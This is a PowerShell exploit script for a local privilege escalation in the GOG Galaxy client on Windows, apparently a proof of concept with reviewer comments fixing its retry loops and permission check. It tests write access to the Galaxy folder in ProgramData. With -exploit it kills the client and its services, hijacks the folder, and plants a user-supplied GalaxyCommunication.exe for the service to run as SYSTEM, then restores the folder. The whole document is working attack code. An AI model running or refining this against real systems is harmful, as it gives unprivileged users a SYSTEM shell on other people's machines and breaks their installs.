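# inputs
#   -exploit : actually perform the folder hijack. Without it the script only runs the
#              permission check and reports whether the target looks vulnerable.
#
# What this does (when -exploit is given): stops the Galaxy client/services, renames
# %ProgramData%\GOG.com\Galaxy aside, recreates it with a redists\ subfolder containing a
# user-supplied GalaxyCommunication.exe, starts the GalaxyCommunication service so it picks
# up that binary, and then tries to put the original folder back. Every step after the
# permission check is destructive to the GOG install, so run it on a box you can restore.
param (
    [switch]$exploit
)

# Folder layout the script works on (all under %ProgramData%).
$gogFolder           = $Env:ProgramData + "\GOG.com\"
$gogGalaxyFolder     = $Env:ProgramData + "\GOG.com\Galaxy"
$gogGalaxyFolder_new = $Env:ProgramData + "\GOG.com\Galaxy_orig"

# Payload that is dropped as <Galaxy>\redists\GalaxyCommunication.exe. Looked up next to the
# script when run from a file; otherwise relative to the current directory, as before.
if ($PSScriptRoot) {
    $payloadPath = Join-Path $PSScriptRoot "GalaxyCommunication.exe"
} else {
    $payloadPath = ".\GalaxyCommunication.exe"
}

# Processes that hold handles inside the Galaxy folder and block the rename.
$gogProcessNames = @(
    "GalaxyClient",
    "GalaxyClientService",
    "GalaxyClient Helper",
    "GOG Galaxy Notifications Renderer",
    "GalaxyCommunication"
)

$identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$username = $identity.Name
# SIDs of the current user and all of its groups. ACEs on ProgramData subfolders are
# commonly granted to a group (e.g. BUILTIN\Users) rather than to the user by name, and a
# name-only comparison would report such a target as "not vulnerable".
$principalSids = @($identity.User.Value) + @($identity.Groups | ForEach-Object { $_.Value })

# Returns $true when at least one Allow ACE on $path grants FullControl to the current user,
# either to the user by name or to one of the user's groups (compared by SID).
# NOTE(review): Deny ACEs and inheritance are not evaluated, so this is a heuristic, not an
# effective-access computation; the authoritative test is whether the rename below succeeds.
function Invoke-CheckAccess($path) {
    $acl = Get-Acl -Path $path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne "Allow") { continue }
        # FileSystemRights renders as a comma-separated enum string; the substring test is
        # the original's criterion and is kept as-is.
        if ($ace.FileSystemRights -notmatch "FullControl") { continue }

        $who = $ace.IdentityReference
        if ($who.Value -eq $username) { return $true }

        try {
            $sid = $who.Translate([System.Security.Principal.SecurityIdentifier]).Value
        } catch {
            # Orphaned or unresolvable identity: cannot be one of ours, keep looking.
            continue
        }
        if ($principalSids -contains $sid) { return $true }
    }
    return $false
}

$gogFolderAccess       = Invoke-CheckAccess $gogFolder
$gogGalaxyFolderAccess = Invoke-CheckAccess $gogGalaxyFolder

if (-not ($gogFolderAccess -and $gogGalaxyFolderAccess)) {
    Write-Output "[-] Permission check faild, target does not seam to be vulnerable!"
    exit
}

Write-Output "[+] Permissions check successful! Target is vulnerable!`n"
if (!$exploit) {
    Write-Output "use -exploit to get a system shell`n"
    exit
}

# Verify the payload exists BEFORE stopping services or renaming anything, so a missing
# file does not leave the GOG install torn down for nothing.
if (-not (Test-Path -Path $payloadPath -PathType Leaf)) {
    Write-Output "[-] payload not found: $payloadPath"
    exit 1
}

# check if GOG is running and try to kill it
Write-Output "[+] try to close GalaxyClient..."
$gog = Get-Process GalaxyClient -ErrorAction SilentlyContinue
if ($gog) {
    # try gracefully first
    $null = $gog.CloseMainWindow()
    # kill after five seconds
    Start-Sleep 5
    if (!$gog.HasExited) {
        $null = $gog | Stop-Process -Force
    }
}
Remove-Variable gog

# check for gog services and shut them down
Write-Output "[+] try to stop Galaxy services..."
Stop-Service -Name "GalaxyClientService" -Force
Stop-Service -Name "GalaxyCommunication" -Force
# wait 5 seconds
Start-Sleep 5

# Move the real Galaxy folder aside. Bounded to $tries attempts: the original decremented
# with "$tries = - 1" (an assignment to -1), which made this loop retry forever.
$renOk = $false
$tries = 5
do {
    try {
        Write-Output "[+] try to rename Galaxy folder..."
        $renItem = Rename-Item $gogGalaxyFolder $gogGalaxyFolder_new -Force -PassThru -ErrorAction 'Stop'
        if ($renItem) { $renOk = $true }
    } catch {
        Write-Output "[-] failed... 
try to kill all GOG processes"
        # check again for any active GOG process and kill them
        foreach ($procName in $gogProcessNames) {
            Get-Process $procName -ErrorAction SilentlyContinue | Stop-Process -Force
        }
        $tries--
        if ($tries -le 0) {
            Write-Output "[-] exploit failed"
            Write-Output $_
            exit 1
        }
        Start-Sleep 5
    }
} while (-not $renOk)

if (-not $renOk) {
    # Defensive: the loop above only exits on success or via exit, but keep the original
    # diagnostic in case that changes.
    Write-Output "[-] Exploit failed, cant rename $gogGalaxyFolder, make sure no other application has opened files in this folder (try a system reboot)"
    exit 1
}

# Recreate the folder structure the service expects and drop the payload into it.
try {
    Write-Output "[+] successful, try to hijack folder structure..."
    $null = New-Item -Path $gogFolder -Name "Galaxy" -ItemType "directory" -ErrorAction 'Stop'
    Start-Sleep 1
    $null = New-Item -Path $gogGalaxyFolder -Name "redists" -ItemType "directory" -ErrorAction 'Stop'
    Start-Sleep 1
    $redists = $gogGalaxyFolder + "\redists\"
    Write-Output "[+] successful, placing payload..."
    Copy-Item $payloadPath -Destination $redists -ErrorAction 'Stop'
    Start-Sleep 1
    Write-Output "[+] successful, spawning system shell..."
} catch {
    Write-Output "[-] exploit failed"
    Write-Output $_
    exit 1
}

# start GalaxService with payload. Failure here is tolerated: the service may already be
# running the dropped binary, and the restore below must happen regardless.
try {
    Start-Service -Name "GalaxyCommunication" -ErrorAction SilentlyContinue
} catch {
    Write-Output ""
}

# restore GOG
Write-Output "`n[+] try to restore folder structure..."
$restoreOk = $false
$tries = 5
do {
    try {
        Remove-Item $gogGalaxyFolder -Recurse -ErrorAction 'Stop'
        Rename-Item $gogGalaxyFolder_new $gogGalaxyFolder -ErrorAction 'Stop'
        $restoreOk = $true
    } catch {
        $tries--
        # Same unbounded-retry bug as above in the original; give up after $tries attempts
        # so the "restore manually" message below is actually reachable.
        if ($tries -le 0) { break }
        Start-Sleep 5
        Write-Output "[-] restore failed, try it again"
    }
} while (-not $restoreOk)

if ($restoreOk) {
    Write-Output "[+] successful, removed exploit and restored everything`n"
} else {
    Write-Output "[-] restore failed you need to do it manually or reinstall GOG"
}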